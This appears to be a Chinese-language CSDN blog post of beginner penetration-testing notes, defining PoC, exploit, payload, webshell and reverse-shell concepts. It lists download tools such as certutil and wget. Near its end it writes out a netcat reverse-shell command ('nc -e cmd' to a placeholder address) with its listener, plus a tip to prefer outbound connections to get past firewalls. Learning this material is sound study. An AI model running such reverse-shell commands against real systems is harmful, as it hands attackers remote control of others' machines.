POC:利用/证明代码,发现漏洞 EXP:留下漏洞攻击
木马:留下,操作控制电脑 病毒:破坏性,正常文件无法打开
payload:有效负载,真正需要执行的代码,管道
PoC通常是无害的,Exp通常是有害的,有了POC,才有EXP。
Payload有很多种,它可以是Shellcode,也可以直接是一段系统命令。同一个Payload可以用于多个漏洞,但每个漏洞都有其自己的EXP,也就是说不存在通用的EXP。
shellcode:payload一种,而exp类似,漏洞
回显
后门 webshell, 反弹:权限转移 黑盒子测试:只有目标
白盒子测试:网站,代码已经知道 跳板:中介
社会工程学:人为的弱点,信任,密码,泄漏的数据库,收集搭建平台,形成社工库,利用漏洞点,搞诈骗一样吸引
个人计算机:主要是以win10和win7现在出现了win11,那么个人计算机主要是解决自己的日常问题
服务器用机:加设应用和网站 linux系统,Windows2008系统,windows2012,window是2016还要乌班图系统
命令:Windows/Linux(网上查)
文件权限:提高权限,获取更多的资料,删除更改 修改权限:拒绝比同意更优先,用户和组,组管所有的用户,如果要改,组需要改
服务权限:
防火墙:默认自带的防火墙
内网:真正意义上组织:看协议!!!
出战:出去(很宽松)
入站:别人进来(外人连接你)(很严格)
实例:文件上传下载————解决无图形化/数据传输
Windows:powershell certutil
Linux:wget +网址:下载文件 curl
反弹shell --解决数据回显,解决数据通讯
交互式:等待应答,webshell无法交互
虚拟机相当于是内网
内网可以连接到
外网连接不到内网
虚拟机发送权限给这个网址C\nc -e cmd 网址
本机可监听 C:\>nc - lvvp 5577
权限交换,在电脑上的操作如同在虚拟机上操作
ipconfig 内网
Linux找Windows 入站
正向/反向连接
尽量让别人出来
标签:渗透,虚拟机,基础知识,漏洞,Windows,EXP,Linux,权限 From: https://blog.csdn.net/2301_80014938/article/details/141633387